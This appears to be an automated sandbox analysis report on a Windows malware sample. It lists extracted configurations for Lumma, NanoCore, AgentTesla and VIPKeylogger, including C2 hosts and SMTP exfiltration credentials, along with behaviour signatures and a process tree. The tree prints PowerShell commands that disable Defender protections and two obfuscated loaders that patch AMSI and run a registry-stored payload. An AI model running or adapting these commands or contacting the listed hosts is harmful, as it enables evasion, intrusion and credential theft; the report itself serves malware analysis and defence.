Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
11-10-2024 14:56
General
-
Target
3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe
-
Size
12KB
-
MD5
55dba6e7aa4e8cc73415f4e3f9f6bdae
-
SHA1
87c9f29d58f57a5e025061d389be2655ee879d5d
-
SHA256
3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a
-
SHA512
f2eb91e812b2ba58c4309fd44edadc8977367c7d9d6214d7e70a0392ae8427d570746ae57cca68dc260901f664f2e8c6c5387118ff01d243abeb5680abe2a352
-
SSDEEP
192:vnpYaU28zxHdo4ZMgQl9q+4ua7HhdSbwxz1ULU87glpK/b26J4Uf1XXr5:vWZdoWMR96uaLhM6ULU870gJR
Malware Config
Extracted
Protocol: smtp- Host:
mail.jhxkgroup.online - Port:
587 - Username:
[email protected] - Password:
7213575aceACE@@
Extracted
lumma
https://clearancek.site
https://licendfilteo.site
https://spirittunek.store
https://bathdoomgaz.store
https://studennotediw.store
https://dissapoiznw.store
https://eaglepawnoy.store
https://mobbipenju.store
https://trustterwowqm.shop/api
Extracted
vipkeylogger
Protocol: smtp- Host:
mail.jhxkgroup.online - Port:
587 - Username:
[email protected] - Password:
7213575aceACE@@ - Email To:
[email protected]
Extracted
nanocore
1.2.2.0
blv23728.ddns.net:6110
127.0.0.1:6110
7c49fc8b-b4e3-4ea2-a895-eda0223cb79d
-
activate_away_mode
true
-
backup_connection_host
127.0.0.1
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2024-07-11T09:55:17.304143036Z
-
bypass_user_account_control
false
-
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
6110
-
default_group
M3M3
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
7c49fc8b-b4e3-4ea2-a895-eda0223cb79d
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
blv23728.ddns.net
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Extracted
agenttesla
Protocol: smtp- Host:
mail.worlorderbillions.top - Port:
587 - Username:
[email protected] - Password:
ORKSEMuW*kNA - Email To:
[email protected]
Extracted
https://my.cloudme.com/v1/ws2/:updatemake/:reality/reality.txt
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
CryptBot
CryptBot is a C++ stealer distributed widely in bundle with other software.
-
Detects CryptBot payload 1 IoCs
CryptBot is a C++ stealer distributed widely in bundle with other software.
-
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 26 IoCs
-
Modifies security service 2 TTPs 1 IoCs
-
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
-
Phorphiex payload 1 IoCs
-
Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Windows security bypass 2 TTPs 6 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs
Using powershell.exe command.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 64 IoCs
-
Executes dropped EXE 46 IoCs
-
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 2 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 13 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
-
Adds Run key to start application 2 TTPs 64 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
-
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
-
Suspicious use of SetThreadContext 14 IoCs
-
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 2 IoCs
-
Drops file in Windows directory 2 IoCs
-
Launches sc.exe 19 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 59 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Modifies data under HKEY_USERS 64 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 12 IoCs
-
Suspicious use of SendNotifyMessage 12 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\http146.70.24.213do1654365431.exe.exeC:\Users\Admin\AppData\Local\Temp\http146.70.24.213do1654365431.exe.exe2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k "C:\Users\Admin\AppData\Local\Temp\gsroyn0gt7s09qnn.bat"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"4⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\d473b7p95cz11a49ejc7kqwx.exe"C:\Users\Admin\AppData\Local\Temp\d473b7p95cz11a49ejc7kqwx.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{a9ceb052-c469-4945-a1e5-c92fa9512c2c}2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:qudQNUQXhHQw{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HRxFodYmuTjHCO,[Parameter(Position=1)][Type]$KprBWudoCS)$CZAHEBlkcre=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+''+'D'+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+'M'+''+'o'+''+'d'+''+[Char](117)+'le',$False).DefineType('M'+'y'+''+[Char](68)+''+'e'+''+'l'+''+'e'+''+[Char](103)+'a'+'t'+'e'+'T'+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+'l'+''+[Char](97)+'ss'+[Char](44)+'P'+[Char](117)+'bli'+[Char](99)+''+[Char](44)+''+'S'+''+'e'+''+[Char](97)+''+'l'+''+'e'+'d'+','+''+[Char](65)+''+'n'+''+[Char](115)+''+'i'+''+[Char](67)+'la'+[Char](115)+'s'+[Char](44)+''+'A'+'uto'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$CZAHEBlkcre.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+'a'+[Char](109)+'e,'+[Char](72)+'i'+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$HRxFodYmuTjHCO).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+'ag'+[Char](101)+'d');$CZAHEBlkcre.DefineMethod(''+'I'+''+[Char](110)+''+'v'+'o'+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+','+'H'+''+[Char](105)+''+'d'+'e'+[Char](66)+''+'y'+'Si'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+'l'+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$KprBWudoCS,$HRxFodYmuTjHCO).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+'i'+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $CZAHEBlkcre.CreateType();}$iADFBxrUqCstL=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'em'+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+''+'n'+'3'+[Char](50)+'.'+'U'+'n'+'s'+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+'e'+[Char](77)+''+'e'+'t'+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$alqishhDqFQEGm=$iADFBxrUqCstL.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+'A'+''+'d'+''+'d'+''+[Char](114)+''+'e'+'ss',[Reflection.BindingFlags]('Pub'+[Char](108)+''+[Char](105)+''+'c'+','+'S'+''+[Char](116)+'a'+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$fPxRppgCgvazeHtbyvs=qudQNUQXhHQw @([String])([IntPtr]);$sufriYclxghmTouIbVWTZh=qudQNUQXhHQw @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eNlbHgtQVGv=$iADFBxrUqCstL.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+[Char](101)+''+'H'+'a'+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('ker'+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+'l')));$TpeDFjMWZFDYKB=$alqishhDqFQEGm.Invoke($Null,@([Object]$eNlbHgtQVGv,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$KFbafCSpQXJKDvfKu=$alqishhDqFQEGm.Invoke($Null,@([Object]$eNlbHgtQVGv,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+'P'+''+'r'+'o'+'t'+'e'+'c'+'t')));$eWXHLwu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TpeDFjMWZFDYKB,$fPxRppgCgvazeHtbyvs).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$ZbLwIbgqPQbbDazOL=$alqishhDqFQEGm.Invoke($Null,@([Object]$eWXHLwu,[Object](''+'A'+''+'m'+'s'+[Char](105)+''+'S'+'c'+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$nqlbFxqeja=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KFbafCSpQXJKDvfKu,$sufriYclxghmTouIbVWTZh).Invoke($ZbLwIbgqPQbbDazOL,[uint32]8,4,[ref]$nqlbFxqeja);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ZbLwIbgqPQbbDazOL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KFbafCSpQXJKDvfKu,$sufriYclxghmTouIbVWTZh).Invoke($ZbLwIbgqPQbbDazOL,[uint32]8,0x20,[ref]$nqlbFxqeja);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+'W'+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+''+'i'+''+[Char](97)+''+'l'+''+'e'+'r'+[Char](115)+'t'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FkgaodVaMZzt{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ksSgfXLQTMLPKG,[Parameter(Position=1)][Type]$vlogRRsDtG)$oFCKKUHqNfj=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+'l'+''+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+'D'+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+[Char](101)+'mo'+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e','Cl'+[Char](97)+'s'+'s'+''+[Char](44)+''+'P'+'u'+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+','+''+'S'+''+'e'+''+[Char](97)+'l'+[Char](101)+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+'A'+[Char](117)+''+[Char](116)+'oCla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$oFCKKUHqNfj.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+'m'+'e'+','+[Char](72)+''+'i'+''+'d'+''+'e'+'B'+[Char](121)+'Si'+[Char](103)+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ksSgfXLQTMLPKG).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+'e'+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+''+'g'+'ed');$oFCKKUHqNfj.DefineMethod(''+[Char](73)+''+[Char](110)+'vok'+[Char](101)+'',''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+'i'+'g'+[Char](44)+''+'N'+''+'e'+''+'w'+''+[Char](83)+''+[Char](108)+'o'+'t'+''+[Char](44)+''+'V'+''+'i'+''+[Char](114)+'t'+[Char](117)+'a'+[Char](108)+'',$vlogRRsDtG,$ksSgfXLQTMLPKG).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+'e'+'d');Write-Output $oFCKKUHqNfj.CreateType();}$GujJBimyZNwjX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+'f'+'t.'+[Char](87)+''+'i'+''+[Char](110)+''+'3'+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+'eNa'+[Char](116)+''+'i'+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+'t'+'h'+''+[Char](111)+''+[Char](100)+'s');$oBWmfnbZIYysJD=$GujJBimyZNwjX.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+'e'+''+[Char](115)+'s',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'ic,'+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DWNCjfchxKppnFjoVMY=FkgaodVaMZzt @([String])([IntPtr]);$pirBorecjzyBVMEuqZksjY=FkgaodVaMZzt @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zLdRhXtBmPa=$GujJBimyZNwjX.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+'a'+[Char](110)+'dl'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+'r'+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+'ll')));$xsheiCCyrtuLBU=$oBWmfnbZIYysJD.Invoke($Null,@([Object]$zLdRhXtBmPa,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$zWYSZUbNsZrUNSmvI=$oBWmfnbZIYysJD.Invoke($Null,@([Object]$zLdRhXtBmPa,[Object](''+'V'+'i'+[Char](114)+'t'+[Char](117)+''+'a'+''+'l'+''+'P'+''+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$mcRSbZk=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xsheiCCyrtuLBU,$DWNCjfchxKppnFjoVMY).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+'d'+''+[Char](108)+'l');$iwKuMPKmRvjwVVkmW=$oBWmfnbZIYysJD.Invoke($Null,@([Object]$mcRSbZk,[Object](''+'A'+'ms'+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+'Bu'+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$TQsDpemWla=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zWYSZUbNsZrUNSmvI,$pirBorecjzyBVMEuqZksjY).Invoke($iwKuMPKmRvjwVVkmW,[uint32]8,4,[ref]$TQsDpemWla);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iwKuMPKmRvjwVVkmW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zWYSZUbNsZrUNSmvI,$pirBorecjzyBVMEuqZksjY).Invoke($iwKuMPKmRvjwVVkmW,[uint32]8,0x20,[ref]$TQsDpemWla);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+'W'+[Char](65)+'RE').GetValue('d'+[Char](105)+''+[Char](97)+'le'+[Char](114)+'st'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
